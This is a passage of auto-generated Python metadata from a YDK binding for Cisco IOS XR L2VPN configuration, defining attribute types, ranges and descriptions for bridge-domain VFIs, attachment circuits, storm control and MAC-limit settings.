_MetaInfoClassMember('bgp-signaling-protocol', REFERENCE_CLASS, 'BgpSignalingProtocol' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.BgpSignalingProtocol',
[], [],
''' Enable Signaling Protocol BGP in this
VFI
''',
'bgp_signaling_protocol',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Autodiscovery BGP
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('ldp-signaling-protocol', REFERENCE_CLASS, 'LdpSignalingProtocol' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.LdpSignalingProtocol',
[], [],
''' Signaling Protocol LDP in this VFI
configuration
''',
'ldp_signaling_protocol',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('route-distinguisher', REFERENCE_CLASS, 'RouteDistinguisher' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteDistinguisher',
[], [],
''' Route Distinguisher
''',
'route_distinguisher',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('route-targets', REFERENCE_CLASS, 'RouteTargets' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery.RouteTargets',
[], [],
''' Route Target
''',
'route_targets',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('table-policy', ATTRIBUTE, 'str' , None, None,
[], [],
''' Table Policy for installation of
forwarding data to L2FIB
''',
'table_policy',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bgp-auto-discovery',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the Virtual Forwarding Interface
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('bgp-auto-discovery', REFERENCE_CLASS, 'BgpAutoDiscovery' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.BgpAutoDiscovery',
[], [],
''' Enable Autodiscovery BGP in this VFI
''',
'bgp_auto_discovery',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('multicast-p2mp', REFERENCE_CLASS, 'MulticastP2Mp' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.MulticastP2Mp',
[], [],
''' Enable Multicast P2MP in this VFI
''',
'multicast_p2mp',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfi-pseudowires', REFERENCE_CLASS, 'VfiPseudowires' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi.VfiPseudowires',
[], [],
''' List of pseudowires
''',
'vfi_pseudowires',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vfi-shutdown', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enabling Shutdown
''',
'vfi_shutdown',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vpnid', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' VPN Identifier
''',
'vpnid',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vfi',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis',
False,
[
_MetaInfoClassMember('vfi', REFERENCE_LIST, 'Vfi' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.Vfis.Vfi',
[], [],
''' Name of the Virtual Forwarding Interface
''',
'vfi',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'vfis',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceIpSourceGuard' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceIpSourceGuard',
False,
[
_MetaInfoClassMember('disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable L2 Interface Dynamic IP source
guard
''',
'disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable IP Source Guard
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', REFERENCE_ENUM_CLASS, 'L2VpnLoggingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnLoggingEnum',
[], [],
''' Logging Type
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface-ip-source-guard',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai.InterfaceDaiAddressValidation' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai.InterfaceDaiAddressValidation',
False,
[
_MetaInfoClassMember('destination-mac-verification', REFERENCE_ENUM_CLASS, 'L2VpnVerificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnVerificationEnum',
[], [],
''' Destination MAC Verification
''',
'destination_mac_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Address Validation
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('ipv4-verification', REFERENCE_ENUM_CLASS, 'L2VpnVerificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnVerificationEnum',
[], [],
''' IPv4 Verification
''',
'ipv4_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-mac-verification', REFERENCE_ENUM_CLASS, 'L2VpnVerificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnVerificationEnum',
[], [],
''' Source MAC Verification
''',
'source_mac_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface-dai-address-validation',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai',
False,
[
_MetaInfoClassMember('disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable L2 Interface Dynamic ARP
Inspection
''',
'disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable L2 Interface Dynamic ARP
Inspection
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-dai-address-validation', REFERENCE_CLASS, 'InterfaceDaiAddressValidation' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai.InterfaceDaiAddressValidation',
[], [],
''' Address Validation
''',
'interface_dai_address_validation',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', REFERENCE_ENUM_CLASS, 'L2VpnLoggingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnLoggingEnum',
[], [],
''' Logging Type
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface-dai',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceProfile' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceProfile',
False,
[
_MetaInfoClassMember('dhcp-snooping-id', ATTRIBUTE, 'str' , None, None,
[], [],
''' Disable DHCP snooping
''',
'dhcp_snooping_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('profile-id', REFERENCE_ENUM_CLASS, 'InterfaceProfileEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceProfileEnum',
[], [],
''' Set the snooping profile
''',
'profile_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface-profile',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes.BdacStormControlType.StormControlUnit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes.BdacStormControlType.StormControlUnit',
False,
[
_MetaInfoClassMember('kbits-per-sec', ATTRIBUTE, 'int' , None, None,
[('64', '1280000')], [],
''' Kilobits Per Second, PktsPerSec and KbitsPerSec
cannot be configured together
''',
'kbits_per_sec',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pkts-per-sec', ATTRIBUTE, 'int' , None, None,
[('1', '160000')], [],
''' Packets Per Second, PktsPerSec and KbitsPerSec
cannot be configured together
''',
'pkts_per_sec',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'storm-control-unit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes.BdacStormControlType' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes.BdacStormControlType',
False,
[
_MetaInfoClassMember('sctype', REFERENCE_ENUM_CLASS, 'StormControlEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'StormControlEnum',
[], [],
''' Storm Control Type
''',
'sctype',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('storm-control-unit', REFERENCE_CLASS, 'StormControlUnit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes.BdacStormControlType.StormControlUnit',
[], [],
''' Specify units for Storm Control Configuration
''',
'storm_control_unit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bdac-storm-control-type',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes',
False,
[
_MetaInfoClassMember('bdac-storm-control-type', REFERENCE_LIST, 'BdacStormControlType' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes.BdacStormControlType',
[], [],
''' Storm Control Type
''',
'bdac_storm_control_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bdac-storm-control-types',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon.SplitHorizonGroupId' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon.SplitHorizonGroupId',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable split horizon group
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'split-horizon-group-id',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon',
False,
[
_MetaInfoClassMember('split-horizon-group-id', REFERENCE_CLASS, 'SplitHorizonGroupId' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.SplitHorizon.SplitHorizonGroupId',
[], [],
''' Split Horizon Group ID
''',
'split_horizon_group_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'split-horizon',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses.StaticMacAddress' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses.StaticMacAddress',
False,
[
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Static MAC address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'static-mac-address',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses',
False,
[
_MetaInfoClassMember('static-mac-address', REFERENCE_LIST, 'StaticMacAddress' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.StaticMacAddresses.StaticMacAddress',
[], [],
''' Static Mac Address Configuration
''',
'static_mac_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'static-mac-addresses',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacAging' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacAging',
False,
[
_MetaInfoClassMember('interface-mac-aging-time', ATTRIBUTE, 'int' , None, None,
[('300', '30000')], [],
''' Mac Aging Time
''',
'interface_mac_aging_time',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mac-aging-type', REFERENCE_ENUM_CLASS, 'MacAgingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacAgingEnum',
[], [],
''' MAC address aging type
''',
'interface_mac_aging_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface-mac-aging',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacSecure' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacSecure',
False,
[
_MetaInfoClassMember('action', REFERENCE_ENUM_CLASS, 'MacSecureActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacSecureActionEnum',
[], [],
''' MAC secure enforcement action
''',
'action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable L2 Interface MAC Secure
''',
'disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable MAC Secure
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', REFERENCE_ENUM_CLASS, 'L2VpnLoggingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnLoggingEnum',
[], [],
''' MAC Secure Logging
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface-mac-secure',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacLimit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacLimit',
False,
[
_MetaInfoClassMember('interface-mac-limit-action', REFERENCE_ENUM_CLASS, 'MacLimitActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLimitActionEnum',
[], [],
''' Interface MAC address limit enforcement
action
''',
'interface_mac_limit_action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mac-limit-max', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Number of MAC addresses on an Interface
after which MAC limit action is taken
''',
'interface_mac_limit_max',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mac-limit-notif', REFERENCE_ENUM_CLASS, 'MacNotificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacNotificationEnum',
[], [],
''' MAC address limit notification action
in a Interface
''',
'interface_mac_limit_notif',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface-mac-limit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac',
False,
[
_MetaInfoClassMember('interface-mac-aging', REFERENCE_CLASS, 'InterfaceMacAging' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacAging',
[], [],
''' MAC-Aging configuration commands
''',
'interface_mac_aging',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mac-learning', REFERENCE_ENUM_CLASS, 'MacLearnEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLearnEnum',
[], [],
''' Enable Mac Learning
''',
'interface_mac_learning',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mac-limit', REFERENCE_CLASS, 'InterfaceMacLimit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacLimit',
[], [],
''' MAC-Limit configuration commands
''',
'interface_mac_limit',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mac-port-down-flush', REFERENCE_ENUM_CLASS, 'PortDownFlushEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'PortDownFlushEnum',
[], [],
''' Enable/Disable MAC Flush When Port goes
down
''',
'interface_mac_port_down_flush',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-mac-secure', REFERENCE_CLASS, 'InterfaceMacSecure' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceMac.InterfaceMacSecure',
[], [],
''' MAC Secure
''',
'interface_mac_secure',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'interface-mac',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' The name of the Attachment Circuit
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('bdac-storm-control-types', REFERENCE_CLASS, 'BdacStormControlTypes' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.BdacStormControlTypes',
[], [],
''' Storm Control
''',
'bdac_storm_control_types',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-dai', REFERENCE_CLASS, 'InterfaceDai' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceDai',
[], [],
''' L2 Interface Dynamic ARP Inspection
''',
'interface_dai',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-flooding', REFERENCE_ENUM_CLASS, 'InterfaceTrafficFloodEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceTrafficFloodEnum',
[], [],
''' Enable or Disable Flooding
''',
'interface_flooding',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-flooding-unknown-unicast', REFERENCE_ENUM_CLASS, 'InterfaceTrafficFloodEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceTrafficFloodEnum',
[], [],
''' Enable or Disable Unknown Unicast
Flooding
''',
'interface_flooding_unknown_unicast',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-igmp-snoop', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach a IGMP Snooping profile
''',
'interface_igmp_snoop',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('interface-ip-source-guard', REFERENCE_CLASS, 'InterfaceIpSourceGuard' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdAttachmentCircuits.BdAttachmentCircuit.InterfaceIpSourceGuard',
[], [],
''' IP Source Guard
''',
'interface_ip_source_guard',
'Cisco-IOS-XR-l2vpn-cfg', False),
